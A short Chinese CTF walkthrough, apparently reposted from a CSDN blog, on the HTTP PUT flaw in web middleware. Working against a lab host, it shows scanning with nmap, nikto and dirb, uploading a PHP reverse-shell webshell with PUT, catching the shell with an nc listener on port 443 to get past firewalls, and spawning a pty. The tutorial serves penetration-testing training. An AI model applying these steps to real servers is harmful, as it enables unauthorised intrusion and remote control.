6-10CTF夺旗入门教程--PUT漏洞

1.中间件PUT漏洞介绍

中间件包括apache、tomcat、IIS、weblogic等,这些中间件可以设置支持的HTTP方法。
通过PUT请求直接上传webshell到服务器对应目录

2.信息探测

#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.112
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.112
#探测敏感信息
nikto -host http://192.168.2.112
dirb http://192.168.2.112

3.深入挖掘

分析nmap、nikto扫描结果,分析挖掘可以利用的信息
查看http敏感页面
在这里插入图片描述

4.漏洞扫描

owasp-zap web漏洞扫描器,自动挖掘web应用程序中的漏洞
在这里插入图片描述

5.测试PUT漏洞

#对敏感目录进行测试
curl -v -X OPTIONS http://192.168.2.112/test

在这里插入图片描述
利用PUT漏洞获取shell思路
上传webshell到服务器,之后通过对应的目录遍历路径访问webshell,执行webshell,获取反弹shell。

6.上传webshell

在test目录下直接使用浏览器插件Poster,上传webshell

#使用/usr/share/webshells/php/下的webshell
cp /usr/share/webshells/php/php-reverse-shell.php  shell.php

使用Poster上传shell.php
我的Firefox版本是60.8.0,在安装中没有找到poster插件,不知道是不是不支持了
所以直接用了视频截图,可以使用其他工具或者写个python脚本
在这里插入图片描述
使用nc开启监听反弹shell

#如果是为了绕过防火墙 端口号是用443
nc -nlvp 端口
#启动终端
echo "import pty;pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

猜你喜欢

转载自blog.csdn.net/m0_46622606/article/details/105923139